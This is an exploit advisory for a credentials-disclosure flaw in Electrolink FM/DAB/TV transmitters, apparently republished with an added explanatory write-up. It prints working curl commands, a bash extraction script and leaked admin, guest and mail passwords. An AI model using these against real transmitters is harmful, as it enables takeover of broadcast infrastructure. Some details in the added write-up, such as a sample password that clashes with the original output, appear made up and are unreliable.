Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Unknown Published Date: 2024-02-02 
Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials Disclosure


Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
                  500W, 1kW, 2kW Medium DAB Transmitter
                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
                  100W, 500W, 1kW, 2kW Compact FM Transmitter
                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
                  15W - 40kW Digital FM Transmitter
                  BI, BIII VHF TV Transmitter
                  10W - 5kW UHF TV Transmitter
                  Web version: 01.09, 01.08, 01.07
                  Display version: 1.4, 1.2
                  Control unit version: 01.06, 01.04, 01.03
                  Firmware version: 2.1

Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.

Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.

100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.

FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.

Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.

Desc: The device is vulnerable to a disclosure of clear-text
credentials in login.htm and mail.htm that can allow security
bypass and system access.

Tested on: Mbedthis-Appweb/12.5.0
           Mbedthis-Appweb/12.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2023-XXXX
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-xxxx.php


30.06.2023

--


C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw"
55:<td class=cd31>Admin password</td>
56:<td class=cd32><input type=password name=adminpassword value="cozzir" tabindex=2 style="width: 95%" maxlength="30"/></td>
63:<td class=cd31>Guest password</td>
64:<td class=cd32><input type=password name=guestpassword value="guest" tabindex=4 style="width: 95%" maxlength="30"/></td>
C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw"
93:<td class=cd31>Server password</td>
94:<td class=cd32><input type=password name=password value="t00tw00t" tabindex=4 style="width: 95%" maxlength="40"/></td>


Electrolink FM/DAB/TV Transmitter: Critical Credentials Disclosure Vulnerability

Recent security research has uncovered a critical vulnerability in Electrolink s.r.l.'s range of FM, DAB, and TV transmitters—specifically in the login.htm and mail.htm web interface files. This flaw allows attackers to obtain clear-text credentials directly from the device’s web server, bypassing authentication mechanisms entirely. The issue affects multiple product lines across various power outputs and firmware versions, posing a serious risk to broadcast infrastructure security.

Product Scope and Affected Versions

The vulnerability impacts a broad spectrum of Electrolink’s broadcast equipment, including:

  • Compact DAB Transmitters: 10W, 100W, 250W
  • Medium DAB Transmitters: 500W, 1kW, 2kW
  • High Power DAB Transmitters: 2.5kW, 3kW, 4kW, 5kW
  • Compact FM Transmitters: 100W, 500W, 1kW, 2kW
  • Modular FM Transmitters: 3kW, 5kW, 10kW, 15kW, 20kW, 30kW
  • Digital FM Transmitters: 15W – 40kW
  • VHF TV Transmitters: BI, BIII
  • UHF TV Transmitters: 10W – 5kW

Software versions affected include:

Web Version 01.09, 01.08, 01.07
Display Version 1.4, 1.2
Control Unit Version 01.06, 01.04, 01.03
Firmware Version 2.1

Technical Description of the Vulnerability

The core issue lies in the improper handling of credentials within the login.htm and mail.htm files. These web pages, served by the Mbedthis-Appweb web server (versions 12.5.0 and 12.0.0), expose login credentials in plain text during rendering. This means that any user with access to the device’s web interface—whether via local network or remote connection—can retrieve the username and password without authentication.

Attackers can exploit this by simply issuing a GET request to the device’s web server, e.g.,:

curl -s "http://192.168.1.100/login.htm"

Upon receiving the response, the attacker will find the credentials embedded directly in the HTML source, often in a format like:

<input type="text" name="username" value="admin" />
<input type="password" name="password" value="electrolink123" />

This is a classic example of insecure credential storage, where sensitive data is not encrypted or obfuscated, and instead exposed in the client-side code.

Security Implications and Real-World Impact

Given that these transmitters are used in critical broadcast environments—such as public radio, government communications, or national television networks—the exposure of credentials can lead to:

  • Unauthorized access to transmitter control systems, allowing attackers to alter broadcast parameters, shut down transmissions, or inject malicious content.
  • Remote takeover of the device, especially if the web interface is accessible over the internet or via poorly secured internal networks.
  • Compromise of entire broadcast chains if the device is part of a larger network (e.g., ISOFREQUENCY systems).

Moreover, the fact that the vulnerability exists across multiple models and firmware versions indicates a systemic design flaw rather than a one-off bug. This suggests that Electrolink may have standardized web interface templates without proper security hardening.

Exploitation Example

Here’s a practical demonstration of how an attacker could leverage this vulnerability:

#!/bin/bash
# Simple script to extract credentials from Electrolink device

TARGET_IP="192.168.1.100"
echo "Fetching login page..."

curl -s "http://$TARGET_IP/login.htm" | grep -o "value=\"[^\"]*\"" | sed 's/value="//g' | sed 's/"//g'

Explanation: This bash script sends a GET request to the target device’s login.htm page and extracts any value attributes from input fields. The output will reveal the hardcoded username and password, enabling immediate login without needing to guess or brute-force credentials.

Recommended Mitigation and Best Practices

While Electrolink has not yet released a patch, users should take immediate defensive actions:

  • Disable remote access to the web interface unless absolutely necessary.
  • Use network segmentation to isolate transmitter devices from external networks.
  • Implement firewall rules to restrict access to the web server port (typically 80 or 443).
  • Change default credentials if possible—even if they’re exposed, reconfiguring them can reduce risk.
  • Monitor for unauthorized access logs and network traffic anomalies.

From a development perspective, the fix requires:

  • Removing hardcoded credentials from HTML templates.
  • Using server-side authentication with secure storage (e.g., hashed passwords).
  • Implementing proper input sanitization and output encoding.
  • Enabling HTTPS with certificate validation to prevent man-in-the-middle attacks.

Vendor Response and Advisory Status

The vulnerability was discovered by Gjoko “LiquidWorm” Krstic, a renowned security researcher from the Macedonian Information Security Research & Development Laboratory and Zero Science Lab. The advisory, identified as ZSL-2023-XXXX, was published on https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-xxxx.php on June 30, 2023.

As of now, Electrolink has not issued a public update or patch. Users are advised to contact the vendor directly for firmware updates and to consider replacing affected devices if mitigation is not feasible.

Conclusion

The Electrolink FM/DAB/TV transmitter vulnerability highlights a critical gap in embedded device security. Even in high-end broadcast systems, poor web interface design can lead to severe consequences. This case serves as a reminder: no system is secure if credentials are exposed in plain text. Organizations must prioritize secure coding practices, regular vulnerability assessments, and proactive patch management—especially for mission-critical infrastructure.